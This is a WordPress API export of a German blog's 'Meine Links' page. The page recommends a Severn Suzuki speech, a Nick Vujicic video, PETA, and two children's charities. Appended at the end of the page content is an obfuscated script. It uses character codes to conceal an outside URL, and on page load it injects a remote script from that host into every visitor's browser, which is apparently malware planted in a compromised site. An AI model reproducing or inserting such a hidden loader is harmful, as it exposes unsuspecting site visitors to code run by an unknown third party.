{"id":1024,"date":"2011-02-28T10:53:49","date_gmt":"2011-02-28T09:53:49","guid":{"rendered":"http:\/\/energiemedizin.de\/blog\/?page_id=1024"},"modified":"2018-03-06T12:40:07","modified_gmt":"2018-03-06T12:40:07","slug":"tipps-links-3","status":"publish","type":"page","link":"http:\/\/blog.energiemedizin.de\/?page_id=1024","title":{"rendered":"Meine Links"},"content":{"rendered":"<p>&nbsp;<\/p>\n<h3><span style=\"color: #3366ff;\"><strong> Hier erhalten Sie von mir ausgew\u00e4hlte Empfehlungen und Links zu Beitr\u00e4gen, die ich f\u00fcr sehenswert halte:<\/strong><\/span><\/h3>\n<p><span style=\"color: #3366ff;\"><strong><br \/>\n<\/strong><\/span><\/p>\n<div>\n<p><strong><span style=\"color: #000000;\">Das M\u00e4dchen, dass die Welt f\u00fcr 5 Minuten zum Schweigen brachte&#8230;<a href=\"https:\/\/www.youtube.com\/watch?v=wNSV4zMquCk\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" class=\"alignright wp-image-5565\" src=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2014\/07\/Severn-Suzuki.jpg\" alt=\"Severn Suzuki\" width=\"235\" height=\"142\" srcset=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2014\/07\/Severn-Suzuki.jpg 431w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2014\/07\/Severn-Suzuki-300x182.jpg 300w\" sizes=\"(max-width: 235px) 100vw, 235px\" \/><\/a><\/span><\/strong><\/p>\n<p id=\"watch-headline-title\"><strong><span style=\"color: #000000;\">Rede von Severn Suzuki 1992 auf UN Earth Summit<\/span><\/strong> <a href=\"https:\/\/www.youtube.com\/watch?v=wNSV4zMquCk\" target=\"_blank\" rel=\"noopener noreferrer\">Weiter&#8230;<\/a><\/p>\n<p><span style=\"color: #000000;\">Das 12-j\u00e4hrige M\u00e4dchen, das die Welt f\u00fcr 6:32 zum Schweigen brachte. Severn Suzuki gr\u00fcndete als 9-j\u00e4hrige<\/span><br \/>\n<span style=\"color: #000000;\"> die Umweltorganisation &#8222;Eco&#8220;, in deren Namen sie hier vor der UNO in R\u00edo de Janeiro spricht.<\/span><a href=\"http:\/\/bit.ly\/vLTx2O\"><br \/>\n<\/a><\/p>\n<\/div>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #000000;\"><strong>Betrachte diese Video &#8211; und dann Dein Leben!<a href=\"https:\/\/www.youtube.com\/watch?v=1bGqTf_jHSE\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" class=\"alignright wp-image-5567\" src=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2014\/07\/Nick.jpg\" alt=\"Nick\" width=\"235\" height=\"121\" srcset=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2014\/07\/Nick.jpg 624w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2014\/07\/Nick-300x154.jpg 300w\" sizes=\"(max-width: 235px) 100vw, 235px\" \/><\/a><\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Pers\u00f6nliches Leid und Glaube an Gott. Leid \u00fcberwinden.<\/span><br \/>\n<span style=\"color: #000000;\"> Warum l\u00e4\u00dft Gott Leid zu? Wo ist Gott, wenn ich Ihn brauche?<\/span><br \/>\n<span style=\"color: #000000;\"> Hat Gott mich vergessen? Wo bleibt Gottes Hilfe? <\/span><span style=\"color: #0000ff;\"><a href=\"https:\/\/www.youtube.com\/watch?v=1bGqTf_jHSE\" target=\"_blank\" rel=\"noopener noreferrer\">Weiter&#8230;<\/a><\/span><\/p>\n<p><span style=\"color: #000000;\">F\u00fcr mich ist es einfach unglaublich wieviel Lebensfreude Nick Vujicic ausstrahlt. Da sollten sich viele Meschen<\/span><br \/>\n<span style=\"color: #000000;\"> in Deutschland eine Scheibe abschneiden, die dauernd jammern, wie schlecht es ihnen geht.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #000000;\"><strong>PETA &#8211; Stoppt Tierqu\u00e4lerei<\/strong><\/span><a href=\"http:\/\/www.peta.de\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" class=\"alignright wp-image-5557\" src=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2014\/07\/logo-ueberpeta.gif\" alt=\"logo-ueberpeta\" width=\"231\" height=\"176\" \/><\/a><\/p>\n<p><span style=\"color: #000000;\">PETA Deutschland e. V. ist eine Schwesterorganisation von PETA USA, der mit \u00fcber drei Millionen Unterst\u00fctzern <\/span><br \/>\n<span style=\"color: #000000;\"> weltweit gr\u00f6\u00dften Tierrechtsorganisation. Ziel der Organisation ist es, durch Aufdecken von Tierqu\u00e4lerei, Aufkl\u00e4rung <\/span><br \/>\n<span style=\"color: #000000;\"> der \u00d6ffentlichkeit und Ver\u00e4nderung der Lebensweise jedem Tier zu einem besseren Leben zu verhelfen.<\/span><br \/>\n<span style=\"color: #000000;\"> Diese Organisation verdient unsere Unterst\u00fczung: <\/span><a href=\"http:\/\/www.peta.de\/web\/ueberpeta.7.html\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/www.peta.de\/<\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><strong><span style=\"color: #000000;\">Ein bemerkenswerter Verein<\/span><\/strong> <a href=\"http:\/\/www.herzenswuensche.de\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" class=\"alignright wp-image-5582\" src=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2011\/02\/HW-Logo-1.jpg\" alt=\"HW-Logo\" width=\"226\" height=\"74\" srcset=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2011\/02\/HW-Logo-1.jpg 523w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2011\/02\/HW-Logo-1-300x98.jpg 300w\" sizes=\"(max-width: 226px) 100vw, 226px\" \/><\/a><br \/>\n<span style=\"color: #000000;\">Herzensw\u00fcnsche e.V. ist ein bundesweit t\u00e4tiger Verein, der schwer kranken Kindern und Jugendlichen lang ersehnte W\u00fcnsche erf\u00fcllt.<\/span><br \/>\n<span style=\"color: #000000;\">Rund 70 ehrenamtliche und drei hauptamtliche Helferinnen und Helfer bem\u00fchen sich, zu Eltern, \u00c4rzten, Therapeuten<br \/>\nund nat\u00fcrlich den betroffenen Kindern einen intensiven Kontakt aufzubauen. Wir m\u00f6chten so herausfinden, welcher<br \/>\nWunsch einem Kind neuen Mut und neue Kraft geben kann. Die Erf\u00fcllung eines lang gehegten Traumes tr\u00e4gt entscheidend<br \/>\ndazu bei, den oft sehr belastenden Klinikalltag besser bew\u00e4ltigen zu k\u00f6nnen. Ob ein Treffen mit Prominenten, ein Aufenthalt<\/span><br \/>\n<span style=\"color: #000000;\"> auf einem Ponyhof, eine Hei\u00dfluftballonfahrt oder aber eine sch\u00f6n ausgerichtete Geburtstagsfeier &#8211; jeder Wunsch wird ganz<br \/>\nindividuell und mit viel Engagement verwirklicht. Hierbei unterst\u00fctzen uns viele Spender und Sponsoren. F\u00fcr jede Form<br \/>\nder Unterst\u00fctzung sind wir von Herzen dankbar und beantworten gern jede Frage. <\/span><br \/>\n<span style=\"color: #000000;\">Bitte setzen Sie sich mit uns in Verbindung.<a href=\" http:\/\/www.herzenswuensche.de\/\" target=\"_blank\" rel=\"noopener noreferrer\"> http:\/\/www.herzenswuensche.de\/<\/a><\/span><\/p>\n<p><span style=\"color: #000000;\"><strong><a href=\"http:\/\/www.kosys-hilft.org\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" class=\"alignright wp-image-5756\" src=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2011\/02\/kosys_hilft_website.png\" alt=\"kosys_hilft_website\" width=\"148\" height=\"188\" \/><\/a><br \/>\nkosys hilft e.V.<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Wir unterst\u00fctzen Kinder mit Handicap und deren Eltern &#8211; und das von ganzem Herzen. Gerade Familien mit Kindern in gesundheitlichen Ausnahmesituationen sind h\u00e4ufig finanziell nicht in der Lage, umfangreiche Therapie Konzepte zu nutzen. Das erleben wir in unserem Heimatl\u00e4ndern Deutschland, \u00d6sterreich und Schweiz genauso wie in fernen L\u00e4ndern. <\/span><br \/>\n<span style=\"color: #000000;\">Nachdem wir mit neoos\u00ae und thinkman\u00ae einfachen Zugriff auf eine phantastische Therapieunterst\u00fctzung haben, war genau das unser Weg.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong><a href=\"http:\/\/www.kosys-hilft.org\" target=\"_blank\" rel=\"noopener noreferrer\">www.kosys-hilft.org <\/a><br \/>\n<\/strong><\/span><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<script type=text\/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,56);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Hier erhalten Sie von mir ausgew\u00e4hlte Empfehlungen und Links zu Beitr\u00e4gen, die ich f\u00fcr sehenswert halte: Das M\u00e4dchen, dass die Welt f\u00fcr 5 Minuten zum Schweigen brachte&#8230; Rede von Severn Suzuki 1992 auf UN Earth Summit Weiter&#8230; Das 12-j\u00e4hrige M\u00e4dchen, das die Welt f\u00fcr 6:32 zum Schweigen brachte. Severn Suzuki gr\u00fcndete als 9-j\u00e4hrige die [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":6,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/1024"}],"collection":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1024"}],"version-history":[{"count":10,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/1024\/revisions"}],"predecessor-version":[{"id":6617,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/1024\/revisions\/6617"}],"wp:attachment":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1024"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}